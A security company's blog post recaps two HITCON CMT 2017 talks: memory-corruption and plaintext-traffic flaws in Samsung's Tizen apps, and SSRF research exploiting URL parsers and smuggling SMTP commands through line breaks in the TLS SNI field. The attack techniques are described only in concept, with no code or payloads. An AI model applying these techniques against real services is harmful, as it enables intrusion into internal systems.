Some of our Troopers had the chance to visit HITCON conference in Taiwan this year. There are two main events: HITCON Pacific, which is aimed more at corporate attendees and HITCON CMT, the community edition, which aims at students and the general Infosec community. HITCON is the biggest security conference in Taiwan.
The venue for the event is the Academia Sinica, one of the most important academic institution in the Republic of China and was founded in 1928 to promote and undertake scholarly research in sciences and humanities. The conference had three usual tracks and one special track that was free to use for the public for demos, presentations and discussions.
You can find more information about the conference and the agenda right here: https://hitcon.org/2017/CMT/agenda.
For this edition of HITCON, offensive talks, specifically about Android security were in focus. We will sum up two of the most impressing talks in this post.
Breaking Tizen by Amihai Neiderman
Tizen is Samsung’s new Operating System for all kinds of IoT devices (including smartphones). It is based on Linux and it’s look and feel is similar to Android. Samsung seems to try to push the Operating System to plenty of devices in a lot of countries, especially on smartphones. It is possible to develop applications with native code and based on HTML5. Outstanding seems to be that there is a test lab available for developers where you can push your code to. It will then be run on a physical Tizen device in that lab and you get to interact with it remotely.
The researcher looking at Tizen has found quite a lot of vulnerabilities in the App components. This includes the TizenStore, the Samsung Cloud App and the Samsung Mobile Browser. Most of the findings are coming from missing or wrong bounds checking in native code resulting in classical memory corruptions. This is especially critical for high privileged Apps like the TizenStore that are also available on all devices.
Concerning the TizenStore, the researcher not only found memory corruptions but also plain text communications to the backend by the App. The implemented logic included a check which tasks needed an encrypted connection. If the logic decided that no encryption was needed the data was sent in plain text. Now the fix got rid of the complete code and just returns “1”, so every connection will be encrypted, which should be the default in all modern systems.
The reported vulnerabilities were difficult to report, the researcher told the audience. It took a while to find the right contact person and until Samsung was willing to fix some of the bugs.
Tizen seems to be a classic example on how a product fails concerning security, because it needs to be pushed out fast to the market and therefore security is neglected. This is especially the case with IoT and is not a problem of Tizen alone.
A New Era of SSRF – Exploiting URL Parser in Trending Programming Languages! by 蔡政達 (Orange Tsai)
This talk focused on Server Side Request Forgery, a technique to attack services by abusing an available web application that will parse an URL and use it in some kind of logic. So an attacker can for example reach internal applications or get around whitelistings by abusing this technique.
The researcher was talking about protocol smuggling first. He managed to attack some non-HTTP text-based protocol services by using HTTPS calls. He abused SNI, an extension to TLS that is not in the encrypted stream and therefore allows clear-text communication with the target. In this case communication with an SMTP server worked by injecting line breaks inside the HTTPS SNI chunk.
The problem with SSRF is that URL parsing is not that easy. Developers should normally rely on libraries that do the job in a secure and efficient way, but the researcher pointed out that also common libraries have severe problems when it comes to URL parsing. He evaluated common parsing libraries such as Python’s httplib and JAVA’s net.URL implementation. All of them had issues either when it comes to CR-LF Injection or in the URL parsing itself.
The talk finished with some demos and case studies that showed once again that complexity kills and that parsing URLs is not a trivial job.